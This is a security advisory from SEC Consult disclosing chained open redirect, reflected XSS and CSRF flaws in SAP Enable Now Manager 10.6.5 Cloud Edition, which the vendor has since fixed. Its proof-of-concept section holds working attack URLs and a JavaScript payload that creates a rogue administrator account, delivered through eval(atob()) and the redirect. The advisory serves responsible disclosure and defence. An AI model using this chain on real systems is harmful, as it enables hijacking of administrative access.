SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect
SAP Enable Now Manager version 10.6.5 Build 2804 Cloud Edition suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.
SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: SAP® Enable Now Manager
 vulnerable version: 10.6.5 (Build 2804) Cloud Edition
      fixed version: May 2023 Release
         CVE number: N/A (cloud)
             impact: high
           homepage: https://www.sap.com/about.html
              found: 2022-10-21
                 by: Paul Serban (Eviden)
                     Fabian Hagg (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"SAP Enable Now solution provides advanced in-application help and
training capabilities helping you to improve productivity and user
adoption, as well as to increase satisfaction of the end-user experience.
Create, maintain, and deliver in-application help, learning materials,
and documentation content easily."

Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now


Business recommendation:
------------------------
Because the Cloud Edition is affected, the vendor automatically pushed
a fix to the production environment in the May 2023 Release.

SEC Consult recommends having a thorough security review performed by
security professionals to identify and resolve potential further critical
security issues.


Vulnerability overview/description:
-----------------------------------
Multiple vulnerabilities were identified that can be chained together to
allow a remote, unauthenticated attacker to create new administrative user
accounts by tricking the victim into clicking a malicious link or visiting
a malicious website prepared by the attacker.

1) Open Redirect/URL Redirection Vulnerability
The file download feature of the application contains an unvalidated
parameter value that exposes it to an open redirect vulnerability. An
attacker can create a malicious URL which redirects the victim to a
malicious site, for example a phishing site that convinces the victim
to log in once again.

2) Reflected Cross Site Scripting (XSS)
A reflected XSS vulnerability was found affecting the same parameter as
used in 1). Due to insufficient input validation and output encoding, an
attacker can inject arbitrary HTML or JavaScript code into the generated
server response, which is executed in the browser of the victim. The
vulnerability can be exploited, for example, to create new administrative
user accounts in the application, thereby fully compromising the
application. Any CSRF protection can be bypassed by means of this
vulnerability.

3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No implementation of CSRF protection was detected in the application.
Using this vulnerability, an attacker can issue requests in the context
of administrative user sessions. This includes critical state-changing
actions such as user creation or role assignment. Note that in the
test environment the option 'Supported Functions' was set to the value
'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.
Certain configurations require this setting to be enabled, e.g. to allow
the SEN Workflow Approver extension to submit data on behalf of the
logged-in user to the SAP Enable Now Manager. Without this parameter,
the extension is only able to read the content and workflow information.
This indicates that there is an insecure feature which allows the protection
mechanism to be disabled globally. It could not be clarified whether this is
the default setting.
In any case, the function should still be enhanced to protect critical
actions such as functions used in user management or role/permission
management even if the mechanism is disabled by configuration.


Proof of concept:
-----------------
1) Open Redirect/URL Redirection Vulnerability
The public endpoint /resources/open_file.html is vulnerable to an
open redirect via the GET parameter 'info'. To verify this vulnerability,
it is sufficient to open the following URL in a web browser:

https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com

After browsing to the above link, the victim gets redirected to
www.sec-consult.com in a new browser window opened by the embedded
call of the function window.open(). Note that neither attacker nor victim
has to be authenticated for successful exploitation.

2) Reflected Cross-Site Scripting (XSS)
The public endpoint /resources/open_file.html is affected by an XSS
vulnerability in the GET parameter 'info'. To verify this vulnerability,
it is sufficient to open the following URL in a web browser:

https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)

After browsing to the above link, an alert window in the victim's browser
displays the value of document.domain, i.e. the domain name of the server
the page was loaded from. This proves the successful execution of the
injected JavaScript code. In fact, any kind of JavaScript code could
be injected by the attacker. Note that neither attacker nor victim
has to be authenticated for successful exploitation.

3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No CSRF protection can be observed in POST requests sent between the
client and server. This includes at least the functions "task creation",
"user creation", "permission assignment" and "role/group assignment". Note
that this vulnerability appears to only affect systems where the CSRF
protection is disabled by the option 'Supported Functions' set to the value
'DISABLE-CSRF-PROTECTION' in the server settings. Although this setting can
be reverted, it is advised to have the protection enabled for critical
operations such as user creation or permission assignment at all times
(also when the option is set).

Several of the vulnerabilities above can be chained together by an
unauthenticated attacker. Considering the types of vulnerabilities,
there are multiple exploitation scenarios. In our example we will
create a link that, when clicked by an administrator victim, will
create a new admin account. For this attack to work, we first need
to gather some information. To create an account, we need to know two
important values: the OU and the UID. The OU is the unique identifier of
the Organizational Unit. The UID here is the unique Group ID of the target
group to which the new user should be added. Both values can be obtained
by performing a simple GET request to the endpoint /self/group.
The following listing shows the server response.
------------------------------------------------------------------------------------------------
HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Vary: Origin
Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;
Content-Type: text/json;charset=UTF-8
Server: SAP
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 396

{"response":{"group":[
{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C","active":true},
{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C","active":true},
{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>8034410C","active":true}   <-- UID of admin group and OU
]}}
------------------------------------------------------------------------------------------------

Finally, in order for the attack to succeed, the attacker needs the
victim (logged in as administrator) to first send a request to the above
endpoint and then a POST request to the endpoint /!/user, which creates
the new user account with the administrator role assigned, using the
values taken from the previous response. These interactions can be
scripted using the following ten lines of JavaScript code.
------------------------------------------------------------------------------------------------
var req1 = new XMLHttpRequest();
req1.open('GET', "https://example.enable-now.cloud.sap/self/group", false);
req1.withCredentials = true;
req1.send();
var obj = JSON.parse(req1.responseText).response;
for (var i = 0; i < obj.group.length; i++) { if (obj.group[i].name === 'Administrators') { var uid = obj.group[i].uid; var ou = obj.group[i].ou; } }
var req2 = new XMLHttpRequest();
req2.open('POST', "https://example.enable-now.cloud.sap/!/user", false);
req2.withCredentials = true;
req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));
------------------------------------------------------------------------------------------------

We can base64-encode this payload and pass it to the JavaScript eval(atob())
function using the XSS vulnerability in the file download feature (see 2).
The link could then be shortened to increase the likelihood of successful
exploitation. This can be achieved, for example, by leveraging the Open
Redirect vulnerability (see 1) to redirect the victim to an attacker-controlled
website that triggers the above payload, making the attack more likely to
succeed. If the victim is logged into the application and is a member of the
Administrator group, a new admin account is created instantly when they click
the link. The attacker can then log in and has full control over the
application.


Vulnerable / tested versions:
-----------------------------
The following versions of the software were found to be vulnerable during our tests:
- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)


Vendor contact timeline:
------------------------
2022-11-08: Contacting vendor via [email protected]
            Vendor requested screenshots and steps to reproduce
2022-11-10: Informed vendor the previously provided POC contains the steps to
            reproduce and screenshots weren't available at that time
2022-11-10: Vendor confirmed issues are under review
2022-11-18: Contacted vendor to request an update
2022-11-18: Vendor confirmed issues are still under review
2022-12-01: Vendor reached back to confirm a Security Incident ticket was
            opened to the Engineering Team
2023-02-02: Contacted vendor to request an update
2023-02-03: Vendor confirmed that engineering had fixes ready and was waiting
            on a release schedule
2023-02-07: Vendor confirmed fix was deployed to production for ticket no
            #2280196564
2023-04-14: Contacted vendor to request an update on the ticket no #2280196563 fix
2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in the
            May release
2023-05-08: Vendor confirmed fix was deployed to production for 2280196563
2023-09-27: Public release of security advisory


Solution:
---------
Because the Cloud Edition is affected, the vendor automatically pushed
a fix to the production environment in the May 2023 Release.


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF P. Serban, F. Hagg / @2023